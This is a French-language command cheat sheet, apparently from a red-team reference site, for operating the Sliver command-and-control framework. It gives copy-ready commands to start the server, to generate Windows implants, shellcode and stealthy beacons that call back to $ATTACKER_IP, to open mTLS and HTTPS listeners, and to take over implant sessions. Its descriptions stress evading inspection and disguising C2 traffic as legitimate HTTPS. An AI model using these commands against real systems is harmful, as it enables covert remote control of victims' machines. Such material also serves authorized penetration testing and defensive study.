Pivoting

Sliver C2

Déployer et opérer des implants Sliver avec mTLS, HTTPS et mode beacon.

Installation & Serveur

Copy command
sliver-server

Description: Démarrer le serveur Sliver : écoute sur 31337 par défaut pour les opérateurs.

Copy command
sliver-client

Description: Connecter un opérateur au serveur Sliver : interface de gestion des implants.

Copy command
multiplayer

Description: Activer le mode multiplayer : permettre à plusieurs opérateurs de se connecter simultanément.

Génération d'implants

Copy command
generate --mtls $ATTACKER_IP:8888 --os windows --arch amd64 --format exe --save /tmp/implant.exe

Description: Générer un implant Windows mTLS : chiffrement mutuel TLS, difficile à inspecter.

Copy command
generate --http $ATTACKER_IP --os windows --arch amd64 --format shellcode --save /tmp/implant.bin

Description: Shellcode HTTP : pour injection dans un processus existant via une autre technique.

Copy command
generate beacon --mtls $ATTACKER_IP:8888 --os windows --seconds 60 --jitter 10

Description: Mode beacon : callback périodique plutôt que connexion permanente, plus discret en prod.

Listeners & Sessions

Copy command
mtls --lport 8888

Description: Ouvrir un listener mTLS sur le port 8888 pour recevoir les connexions des implants.

Copy command
https --lport 443 --domain $DOMAIN

Description: Listener HTTPS avec domain fronting optionnel : trafic C2 qui ressemble à du HTTPS légitime.

Copy command
sessions

Description: Lister les sessions actives : voir tous les implants connectés et leur statut.

Copy command
use $SESSION_ID

Description: Interagir avec une session : passer en mode interactif sur l'implant sélectionné.